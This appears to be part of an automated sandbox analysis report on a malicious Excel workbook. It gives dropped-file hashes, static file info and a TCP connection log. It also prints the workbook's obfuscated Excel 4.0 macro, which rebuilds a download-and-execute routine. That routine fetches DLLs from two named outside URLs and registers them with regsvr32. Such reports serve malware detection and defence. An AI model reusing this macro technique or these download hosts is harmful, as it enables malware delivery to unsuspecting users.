                                                                                                                                                        Preview: .PNG........IHDR..............[.J....sRGB.........pHYs..........+......IDATx^.].`......{%.$..A...R.P@z....O...S.<;.VT.REA.(...I...{.......m...]..r./.......~.|]h.Z....P.(........E."@...P.(.v.P.@..E."@....#@y.......E."@y.......E."...*78C.~O...P.<....<o..).....3.(op...."@...x...7x...S.(...g.P...!.=E."@..<.(o.5.3..P.(.......B.{..E.".y.P..ykNgL...P..!@y.3.......E........."@...8C...g...)......!@y..9.1E."@.p........S.(....C....[s:c..E."......!D...P.(.........t.....E....78C.~O...P.<....<o..).....3.(op...."@...x...7x...S.(...g.P...!.=E."@..<.(o.5.3..P.(.......B.{..E.".y.P..ykNgL...P..!@y.3.......E........."@...8C...g...)......!@y..9.1E."@.p........S.(....C....[s:c..E."......!D...P.(.........t.....E....78C.~O...P.<....<o..).....3.(op...."@...x...7x...S.(...g.P...!.=E."@..<.(o.5.3..P.(.......B.{..E.".y.P..ykNgL...P..!@y.3.......E........."@...8C...g...)......!@y..9.1E."@.p........S.(....C....[s:c..E."......!D...P.(.........t.....E....78C.~O...P.<....<o..).....3.(op...."@...x..
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\D45FCAB1.png
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                        File Type:PNG image data, 490 x 30, 8-bit/color RGB, non-interlaced
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):18547
                                                                                                                                                        Entropy (8bit):7.9850486438978985
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:kBCIQCloAwCZDy0xOTn6/g6l4NpWfw9nHk6Ka01f7Y/H:kBCIQpAwODPMT6/gfOUKN70
                                                                                                                                                        MD5:ED31C7053D581EDC4C98D222CE02EDEF
                                                                                                                                                        SHA1:6BA7A49CC6FF8FE00E9C5BC75F48AB7E679536DD
                                                                                                                                                        SHA-256:0FCF61397154DF01CFAECA362BD643D88AAD5FEDD07B52DC8A921CC0D7236534
                                                                                                                                                        SHA-512:929BF13F2A050B33D0EABDAC97CAAFDDE612AD521027FEE4DD51E28A3CF61198D6C045E00AB85223C73D74D18BB4EAA1681C7AFA917946DC08A3C75FB2AB4935
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview: .PNG........IHDR.............l{......sRGB.........pHYs..........+....H.IDATx^...U............"x....U...."...Tc.{...M1M..In....TATb4F,`oD..Q..3......g.3..Lr.D....a8....~.z....Z...yyF..9...:.H.Q2..)/L.....Q.}....(J..,...w2>R.$..G2..m>..|...0.M.g.Xnjj...P.v..x....S......B..p.=.Lz.^..Wi..2U.V'.a..*DE.'..rT.z....#.;..]....[?.C...o.m`]..m][;.:<..]F.9..u..Q]c.Ue.9....(.F.Z.~s..Q:..B...)..LZ.TTo..P.gc.l.'.X.}..H....Q.h|....L..rcd.2dN..co..5.....w.U.4..}........{.Q.....D2.J.z~..:Y3,.H..(#.J.Q......N.._7....w.....].2w.6...._....u.......9-.7.f9...E9...p.A..f....=....Bqu....A.u.JG>b"...%..0..W.H=...G#.DR.....P.|FD).NJ....)>.;...M...T*.dW..t:[.xT..M.|S...O..."M.4u7.uS...]4..R.vK....*).ZK.. J.=.9C.].kr..ES..6..f.(.....N':..t..^.S....kn[s.#..(.....m.....~....6>....:u.J.mO.....%D...Q...6%....!......H.....v..^%....$.._..V........[o5.H8......n.~M.z.RL.0p:.iC.k.1..$...............3[....mS5..........E...2.&...k]...A.....K.8...5..O.@7.[-.F4*7...i....in...y....A
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\17B40000
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):160685
                                                                                                                                                        Entropy (8bit):7.960590987645444
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3072:AL289VlUBWA6CFvA7brCxAVIKW1xVymd1xXPfZTkdm3bGeAxiYbX:/83liWA6FiYW1xVyWxffZTkeGKa
                                                                                                                                                        MD5:7E75F03941F240AA7190A08B60F3DD64
                                                                                                                                                        SHA1:D35A9AF59DE7669A5B834E47C8152434297A594F
                                                                                                                                                        SHA-256:CD196E167E0BBC1054D6DA19E4D9392CC88A8DCE9FADF080E133350703B3318D
                                                                                                                                                        SHA-512:8DD02F7956125D799B40A5EA3E26D985CEB9AC7D5B0415BC2EE93D1E23F421E6F81112B3F52B33FDF1541D03F805648C40438EA1F93EBC38C9BC3BE9C3D20856
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview: .U.n.0....?......(..r.Mrl.$...\K....I..V.6P.....=H..pv.;.ZYS=AD.]......I...Z.....*L.)a............:.V..e}J...({........G+....!...~9.|.....)c........fE..%s.X.u.].j...h)...ON."..b.%(/.-A7."..=@...Q.c....`..(gp.+Nm..>....q2....,G.^..@f...w..a..N..ZAu'b.&,..W.?...{.lv.d3-..`..Xc.........(..T"..............#u\.':>.#.%.Cb..0.'g[.9.....G............57..zz}..=vbZ..3...t.s/"..Dm.;.....PQ<g.|x8...h./......p../.>G.. &...?.A..4.NN7.!.@.p.2.g?.......PK..........!..t..............[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):22
                                                                                                                                                        Entropy (8bit):2.9808259362290785
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                        MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                        SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                        SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                        SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                        C:\Users\user\Desktop\~$plan-515372324.xlsb
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):165
                                                                                                                                                        Entropy (8bit):1.6081032063576088
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                        MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                        SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                        SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                        SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                        Static File Info

                                                                                                                                                        General

                                                                                                                                                        File type:Microsoft Excel 2007+
                                                                                                                                                        Entropy (8bit):7.950442215459519
                                                                                                                                                        TrID:
                                                                                                                                                        • Excel Microsoft Office Binary workbook document (47504/1) 49.74%
                                                                                                                                                        • Excel Microsoft Office Open XML Format document (40004/1) 41.89%
                                                                                                                                                        • ZIP compressed archive (8000/1) 8.38%
                                                                                                                                                        File name:plan-515372324.xlsb
                                                                                                                                                        File size:159199
                                                                                                                                                        MD5:08e52afbefa423fb9f1ea0af88a4880e
                                                                                                                                                        SHA1:2d688dfee28f75553bc1d3633f891d2e70e0408b
                                                                                                                                                        SHA256:aaa32ff3e41c61fe828f0850e702f5ed7ffd6177c4bf80ed15324525537f44cd
                                                                                                                                                        SHA512:7a5400ec826ecaa0fa6a8beb9022bd9e918f11cf97e57d747477720889f7203af983620e2f7b543fb1ff5cc5a9eff13447d6353506c862dfe2ebd23b7a63dee8
                                                                                                                                                        SSDEEP:3072:q9VlUBWA6CFvA7bpKCxAVIKa8d/p4DqLdb1luxVymd1xXPtLrC/:q3liWA6FVNYa8dh4exQxVyWxfta
                                                                                                                                                        File Content Preview:PK..........!.d/.}............[Content_Types].xml ...(.......................................................................................................................................................((................................................

                                                                                                                                                        File Icon

                                                                                                                                                        Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                        Static OLE Info

                                                                                                                                                        General

                                                                                                                                                        Document Type:OpenXML
                                                                                                                                                        Number of OLE Files:1

                                                                                                                                                        OLE File "plan-515372324.xlsb"

                                                                                                                                                        Indicators

                                                                                                                                                        Has Summary Info:
                                                                                                                                                        Application Name:
                                                                                                                                                        Encrypted Document:
                                                                                                                                                        Contains Word Document Stream:
                                                                                                                                                        Contains Workbook/Book Stream:
                                                                                                                                                        Contains PowerPoint Document Stream:
                                                                                                                                                        Contains Visio Document Stream:
                                                                                                                                                        Contains ObjectPool Stream:
                                                                                                                                                        Flash Objects Count:
                                                                                                                                                        Contains VBA Macros:

                                                                                                                                                        Macro 4.0 Code

                                                                                                                                                        ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                                                                                                                        ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,EXE,,,R,J,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,,LM,JC,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,on,CB,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,wnl,,oadT,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,""")",Fil,,LDo,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,&,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"(""r",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,eg,,0,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,svr32 ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=,=,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,CAL,"""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"(""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,khangland.pro/v8gEDeSB/sun.html ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,jaipurbynite.com/stLdQs9R53/sun.htm,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                                                                                                                        "=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=FORMULA('Doc2'!BA3,'Doc3'!AO18)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=FORMULA(""U""&'Doc3'!AO18&'Doc2'!BA4&'Doc2'!BA5,'Doc3'!AP13)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA('Doc2'!AX24,'Doc3'!AP16)",,,,,,,,,,,,,,,,"=FORMULA('Doc2'!BB3&'Doc2'!BB4&'Doc2'!BB5&""B"",'Doc3'!AP15)",,,,,,,,,,,,,,,,"=FORMULA(before.6.17.50.sheet!AY47,'Doc3'!AO19)",,,,,,,,,,,,,,,,"=FORMULA('Doc2'!AX25,'Doc3'!AP17)",,,,,,,,,,,,,,,,"=FORMULA('Doc2'!AZ14,'Doc3'!AO20)",,,,,,,,,,,,,,,,"=FORMULA(""U""&'Doc3'!AO18&'Doc2'!BA7&'Doc2'!AY6&'Doc2'!BA6&'Doc2'!BA9&'Doc2'!AY7&""eA"",'Doc3'!AP14)",,,,,,,,,,,,,,,,"=FORMULA('Doc2'!AY14&'Doc2'!AX16&'Doc3'!AO19&'Doc2'!AY18&'Doc3'!AP13&'Doc2'!AY16&'Doc2'!AY17&'Doc2'!AY16&'Doc3'!AP14&'Doc2'!AY16&'Doc2'!AY17&'Doc2'!AY16&'Doc3'!AP15&'Doc2'!AY16&'Doc2'!AY20&'Doc2'!AY17&'Doc2'!AY16&""https://""&'Doc3'!AP17&'Doc2'!AY16&'Doc2'!AY17&'Doc2'!AY16&before.6.17.50.sheet!AY41&'Doc2'!AY16&'Doc2'!AY20&'Doc2'!AY20&'Doc2'!AY19,'Doc3'!AN14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA('Doc3'!AO20&'Doc2'!AX3&""C""&'Doc2'!AX10&'Doc2'!AX11&'Doc2'!AX12&'Doc2'!AX8&'Doc2'!AX9&'Doc2'!AX8&before.6.17.50.sheet!AY40&'Doc2'!AX7,'Doc3'!AN17)",,,,,,,,,,,,,,,,"=FORMULA('Doc3'!AO20&'Doc2'!AX3&""C""&'Doc2'!AX10&'Doc2'!AX11&'Doc2'!AX12&'Doc2'!AX8&'Doc2'!AX9&'Doc2'!AX8&before.6.17.50.sheet!AY41&'Doc2'!AX7,'Doc3'!AN18)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA('Doc2'!AY14&'Doc2'!AX16&'Doc3'!AO19&'Doc2'!AY18&'Doc3'!AP13&'Doc2'!AY16&'Doc2'!AY17&'Doc2'!AY16&'Doc3'!AP14&'Doc2'!AY16&'Doc2'!AY17&'Doc2'!AY16&'Doc3'!AP15&'Doc2'!AY16&'Doc2'!AY20&'Doc2'!AY17&'Doc2'!AY16&""https://""&'Doc3'!AP16&'Doc2'!AY16&'Doc2'!AY17&'Doc2'!AY16&before.6.17.50.sheet!AY40&'Doc2'!AY16&'Doc2'!AY20&'Doc2'!AY20&'Doc2'!AY19,'Doc3'!AN13)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&RUN('Doc3'!AN10)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""..\palpy1.dll""",,,,,,,,,,,,,,,,"=""..\palpy2.dll""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""LdecvsbgvrsxLxrgxgL"",1)",,,,,,,,,,,,,,,,"=LEFT(""LdecvsbgvrsxLxrgxg"",1)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                                                                                                                                                        Network Behavior

                                                                                                                                                        Network Port Distribution

                                                                                                                                                        TCP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Jun 30, 2021 00:08:32.935113907 CEST49739443192.168.2.4103.28.39.29
                                                                                                                                                        Jun 30, 2021 00:08:33.164993048 CEST44349739103.28.39.29192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:33.165199041 CEST49739443192.168.2.4103.28.39.29
                                                                                                                                                        Jun 30, 2021 00:08:33.167490005 CEST49739443192.168.2.4103.28.39.29
                                                                                                                                                        Jun 30, 2021 00:08:33.396576881 CEST44349739103.28.39.29192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:33.397178888 CEST44349739103.28.39.29192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:33.397212982 CEST44349739103.28.39.29192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:33.397241116 CEST44349739103.28.39.29192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:33.397260904 CEST44349739103.28.39.29192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:33.397259951 CEST49739443192.168.2.4103.28.39.29
                                                                                                                                                        Jun 30, 2021 00:08:33.397304058 CEST49739443192.168.2.4103.28.39.29
                                                                                                                                                        Jun 30, 2021 00:08:33.397315979 CEST49739443192.168.2.4103.28.39.29
                                                                                                                                                        Jun 30, 2021 00:08:33.397321939 CEST49739443192.168.2.4103.28.39.29
                                                                                                                                                        Jun 30, 2021 00:08:33.399928093 CEST44349739103.28.39.29192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:33.400088072 CEST49739443192.168.2.4103.28.39.29
                                                                                                                                                        Jun 30, 2021 00:08:33.443725109 CEST49739443192.168.2.4103.28.39.29
                                                                                                                                                        Jun 30, 2021 00:08:33.674485922 CEST44349739103.28.39.29192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:33.674612999 CEST49739443192.168.2.4103.28.39.29
                                                                                                                                                        Jun 30, 2021 00:08:33.675638914 CEST49739443192.168.2.4103.28.39.29
                                                                                                                                                        Jun 30, 2021 00:08:33.907320023 CEST44349739103.28.39.29192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:33.907463074 CEST49739443192.168.2.4103.28.39.29
                                                                                                                                                        Jun 30, 2021 00:08:33.907469988 CEST44349739103.28.39.29192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:33.907556057 CEST49739443192.168.2.4103.28.39.29
                                                                                                                                                        Jun 30, 2021 00:08:33.995299101 CEST49739443192.168.2.4103.28.39.29
                                                                                                                                                        Jun 30, 2021 00:08:34.158024073 CEST49741443192.168.2.4104.244.121.13
                                                                                                                                                        Jun 30, 2021 00:08:34.226876974 CEST44349739103.28.39.29192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:34.359838963 CEST44349741104.244.121.13192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:34.360023975 CEST49741443192.168.2.4104.244.121.13
                                                                                                                                                        Jun 30, 2021 00:08:34.360469103 CEST49741443192.168.2.4104.244.121.13
                                                                                                                                                        Jun 30, 2021 00:08:34.561994076 CEST44349741104.244.121.13192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:34.562361002 CEST44349741104.244.121.13192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:34.562401056 CEST44349741104.244.121.13192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:34.562439919 CEST44349741104.244.121.13192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:34.562465906 CEST44349741104.244.121.13192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:34.562503099 CEST49741443192.168.2.4104.244.121.13
                                                                                                                                                        Jun 30, 2021 00:08:34.562563896 CEST49741443192.168.2.4104.244.121.13
                                                                                                                                                        Jun 30, 2021 00:08:34.562578917 CEST49741443192.168.2.4104.244.121.13
                                                                                                                                                        Jun 30, 2021 00:08:34.562586069 CEST49741443192.168.2.4104.244.121.13
                                                                                                                                                        Jun 30, 2021 00:08:34.565370083 CEST44349741104.244.121.13192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:34.565521002 CEST49741443192.168.2.4104.244.121.13
                                                                                                                                                        Jun 30, 2021 00:08:34.580204964 CEST49741443192.168.2.4104.244.121.13
                                                                                                                                                        Jun 30, 2021 00:08:34.781984091 CEST44349741104.244.121.13192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:34.782138109 CEST49741443192.168.2.4104.244.121.13
                                                                                                                                                        Jun 30, 2021 00:08:35.131728888 CEST49741443192.168.2.4104.244.121.13
                                                                                                                                                        Jun 30, 2021 00:08:35.348674059 CEST44349741104.244.121.13192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:35.348721981 CEST44349741104.244.121.13192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:35.348805904 CEST49741443192.168.2.4104.244.121.13
                                                                                                                                                        Jun 30, 2021 00:08:35.348855972 CEST49741443192.168.2.4104.244.121.13
                                                                                                                                                        Jun 30, 2021 00:08:35.348942995 CEST49741443192.168.2.4104.244.121.13
                                                                                                                                                        Jun 30, 2021 00:08:35.550203085 CEST44349741104.244.121.13192.168.2.4

                                                                                                                                                        UDP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
